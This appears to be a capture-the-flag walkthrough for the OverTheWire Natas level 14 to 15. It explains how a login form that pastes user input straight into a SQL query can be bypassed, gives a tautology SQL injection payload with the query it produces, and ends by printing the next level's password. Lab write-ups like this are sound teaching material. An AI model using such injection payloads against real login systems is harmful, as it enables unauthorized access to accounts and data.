Natas15
Website URL: http://overthewire.org/wargames/natas/natas15.html
According to the data on the OverTheWire webpage.
Username: natas15
URL: http://natas15.natas.labs.overthewire.orgLet’s log into the URL for Natas14
Looking at the source code:
So we have stepped into the domain of SQL now. Well, bring it on!
Here, we can see that the username and password field supplied by the user are directly fed into the SELECT query to the database. That’s a big mistake!
The intended purpose for this was to compare username and password supplied to the ones stored in the database. But the flaw here is that after supplying password, an attacker can continue the query performing a tautology based SQL injection attack, thereby getting a true response from the server.
Let’s test it out. We will supply a username (one guaranteed to exist is “natas15”). The password we can supply anything, but after that, we’ll add a tautology statement, a statement that will always evaluate to be true.
Username: natas15
Password: natas15" or "1" = "1To explain the distribution of the quotation marks, let’s plug the input directly into the SELECT statement to see what query will be executed:
SELECT * from users where username="natas15" and password=" natas15" or"1"="1 "
As you see, the quotation marks pre-terminate the password string and modify the intent of the SQL statement completely. Let’s execute it.
Never believe the user will behave as you want them to!
Password for next level: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J